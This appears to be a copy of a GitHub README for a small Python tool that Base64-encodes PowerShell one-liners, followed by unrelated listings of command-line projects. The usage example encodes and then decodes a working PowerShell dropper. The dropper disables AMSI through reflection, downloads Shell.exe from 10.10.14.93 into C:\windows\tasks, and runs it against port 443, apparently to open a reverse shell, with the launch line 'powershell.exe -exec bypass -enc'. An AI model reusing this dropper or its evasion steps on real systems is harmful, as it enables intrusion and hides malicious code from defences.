A very simple python script to encode and decode PowerShell one-liners.

Related tags

Command-line Toolsps-encoder
Overview

PowerShell Encoder

A very simple python script to encode and decode PowerShell one-liners.

I used Raikia's PowerShell encoder ALOT, but one day it went down, and I was sad! So I created this simple script that I could run on Linux.

For anybody that doesn't know PowerShell doesn't just use Base64, it uses UTF16-LE Base64.

Usage

Show the help:

./ps-encoder.py                                  
Usage: ./ps-encoder.py [OPTION]... [FILE]
PowerShell Base64 encode or decode FILE, or standard input, to standard output.

With no FILE provided as the second argument, the second argument will be encoded or decoded

  -d, --decode      decode the powershell FILE or argument.
  -e, --encode      encode the powershell FILE or argument.
  -h, --help        display this help and exit.

 If you want to ouput to a file use the stdout > operator.

Examples

Encode

Encode a PowerShell dropper file:

./ps-encoder.py -e dropper.txt                    
powershell.exe -exec bypass -enc JABhACAAPQAgAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkAOwBGAG8AcgBFAGEAYwBoACgAJABiACAAaQBuACAAJABhACkAIAB7AGkAZgAgACgAJABiAC4ATgBhAG0AZQAgAC0AbABpAGsAZQAgACIAKgBpAHUAdABpAGwAcwAiACkAIAB7ACQAYwAgAD0AIAAkAGIAfQB9ADsAJABkACAAPQAgACQAYwAuAEcAZQB0AEYAaQBlAGwAZABzACgAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEYAbwByAEUAYQBjAGgAKAAkAGUAIABpAG4AIAAkAGQAKQAgAHsAaQBmACAAKAAkAGUALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAdABGAGEAaQBsAGUAZAAiACkAIAB7ACQAZgAgAD0AIAAkAGUAfQB9ADsAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AOQAzAC8AUwBoAGUAbABsAC4AZQB4AGUAIgAsACAAIgBDADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAUwBoAGUAbABsAC4AZQB4AGUAIgApADsACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABTAGgAZQBsAGwALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAzACAANAA0ADMAIgA7AAoA

To file:

./ps-encoder.py -e dropper.txt > encoded-dropper.txt

Decode

Decode a PowerShell dropper:

./ps-encoder.py -d JABhACAAPQAgAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkAOwBGAG8AcgBFAGEAYwBoACgAJABiACAAaQBuACAAJABhACkAIAB7AGkAZgAgACgAJABiAC4ATgBhAG0AZQAgAC0AbABpAGsAZQAgACIAKgBpAHUAdABpAGwAcwAiACkAIAB7ACQAYwAgAD0AIAAkAGIAfQB9ADsAJABkACAAPQAgACQAYwAuAEcAZQB0AEYAaQBlAGwAZABzACgAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEYAbwByAEUAYQBjAGgAKAAkAGUAIABpAG4AIAAkAGQAKQAgAHsAaQBmACAAKAAkAGUALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAdABGAGEAaQBsAGUAZAAiACkAIAB7ACQAZgAgAD0AIAAkAGUAfQB9ADsAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AOQAzAC8AUwBoAGUAbABsAC4AZQB4AGUAIgAsACAAIgBDADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAUwBoAGUAbABsAC4AZQB4AGUAIgApADsACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABTAGgAZQBsAGwALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAzACAANAA0ADMAIgA7AAoA
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true);
(new-object system.net.webclient).downloadfile("http://10.10.14.93/Shell.exe", "C:\windows\tasks\Shell.exe");
Start-Process -FilePath "C:\Windows\Tasks\Shell.exe" -ArgumentList "10.10.14.93 443";

To file:

./ps-encoder.py -d encoded-dropper.txt > dropper.txt
Owner
John Tear
OSCP | OSEP | OSCE - I am me... just an amateur malware developer. If you use my code, don't be naughty, keep it legal!!!
John Tear
GitHub Repository
A simple automation script that logs into your kra account and files your taxes with one command

EASY_TAX A simple automation script that logs into your kra account and files your taxes with one command Currently works for Chrome users. Will creat

leon koech 13 Sep 23, 2021
📦 A command line utility to put text in a box.

boxie A command line utility to put text in a box. Installation pip install boxie If you are on Linux you may need to use sudo to access this globally

Eliaz Bobadilla 10 Jun 30, 2022
Multifunctional library for creating progress bars.

👋 Content Installation Using github Using pypi Quickstart Flags Useful links Documentation Pypi Changelog TODO Contributing FAQ Bar structure ⚙️ Inst

DenyS 27 Jan 01, 2023
doq (python docstring generator) extension for coc.nvim

coc-pydocstring doq (python docstring generator) extension for coc.nvim Install CocInstall: :CocInstall coc-pydocstring vim-plug: Plug 'yaegassy/coc-p

yaegassy 27 Jan 04, 2023
Fetch is use to get information about anything on the shell using Wikipedia.

Fetch Search wikipedia article on command line [Why This?] [Support the Project] [Installation] [Configuration] Why this? Fetch helps you to quickly l

Yash Singh 340 Dec 18, 2022
uploadgram uses your Telegram account to upload files up to 2GiB, from the Terminal.

uploadgram uploadgram uses your Telegram account to upload files up to 2GiB, from the Terminal. Heavily inspired by the telegram-upload Installing: pi

Shrimadhav U K 97 Jan 06, 2023
A CLI tool to disable and enable security standards controls in AWS Security Hub

Security Hub Controls CLI A CLI tool to disable and enable security standards controls in AWS Security Hub. It is designed to work together with AWS S

AWS Samples 4 Nov 14, 2022
Unconventional ways to save an Image

Unexpected Image Saves Unconventional ways to save an image 😄 Have you ever been bored by the same old .png, .jpg, .jpeg, .gif and all other image ex

Eric Mendes 15 Nov 06, 2022
🎈 A Mini CLI-based Operating System simulator

Mini OS Simulator Summary 🎈 A Mini CLI-based Operating System simulator, well, not really. It simulates a file system with songs and movies and stuff

Jaiyank S. 3 Feb 14, 2022
A Python3 rewrite of my original PwnedConsole project from almost a decade ago

PwnedConsoleX A CLI shell for performing queries against the HaveIBeenPwned? API to gather breach information for user-supplied email addresses. | wri

1 Jul 23, 2022
Tstock - Check stocks from the terminal

tstock - Check stocks from the terminal! 📈 tstock is a tool to easily generate stock charts from the command line. Just type tstock aapl to get a 3 m

Gabe Banks 502 Dec 30, 2022
🌍 Harness the power of whatsmydns from the command-line.

chkdns Harness the power of whatsmydns from the command-line. Installing with pip pip install chkdns Run chkdns --host github.com Alternatively you ca

Craig Gumbley 3 Oct 29, 2022
MasterDuel Image Recognition Translation Command Line Tool

MasterDuelTranslate(Use Ygo Card DataBase,belong win32 window shot & image match)

PatchouliTC 77 Dec 01, 2022
A CLI tool for using GLIDE to generate images from text.

Text-Glided-Diffusion Installation First clone this repository: git clone https://github.com/afiaka87/text-glided-diffusion.git cd text-glided-diffusi

Clay Mullis 68 Dec 30, 2022
Shortcut-Maker - It is a tool that can be set to run any tool with a single command

Shortcut-Maker It is a tool that can be set to run any tool with a single command Coded by Dave Smith(Owner of Sl Cyber Warriors) Command list 👇 pkg

Dave Smith 10 Sep 14, 2022
Spotify Offline is a command line tool that allows one to download Spotify playlists in MP3 format.

Spotify Offline v0.0.2 listen to your favorite spotify songs, offline Overview Spotify Offline (spotifyoffline) is a command line tool that allows one

Aarush Gupta 1 Nov 28, 2021
Lexeme - CLI to play a word-guessing game like Wordle

What is this? Python program to play a word-guessing game like Wordle, but… More addictive because you can play it over and over and over, not just on

Dan Lenski 6 Oct 26, 2022
🏃 Python3 Solutions of All Problems in GCJ 2022 (In Progress)

GoogleCodeJam 2022 Python3 solutions of Google Code Jam 2022. Solution begins with * means it will get TLE in the largest data set. Total computation

kamyu 12 Dec 20, 2022
A tool to automatically convert old string literal formatting to f-strings

flynt - string formatting converter flynt is a command line tool to automatically convert a project's Python code from old "%-formatted" and .format(.

Elijah K 551 Jan 06, 2023
Postgres CLI with autocompletion and syntax highlighting

A REPL for Postgres This is a postgres client that does auto-completion and syntax highlighting. Home Page: http://pgcli.com MySQL Equivalent: http://

dbcli 10.8k Jan 02, 2023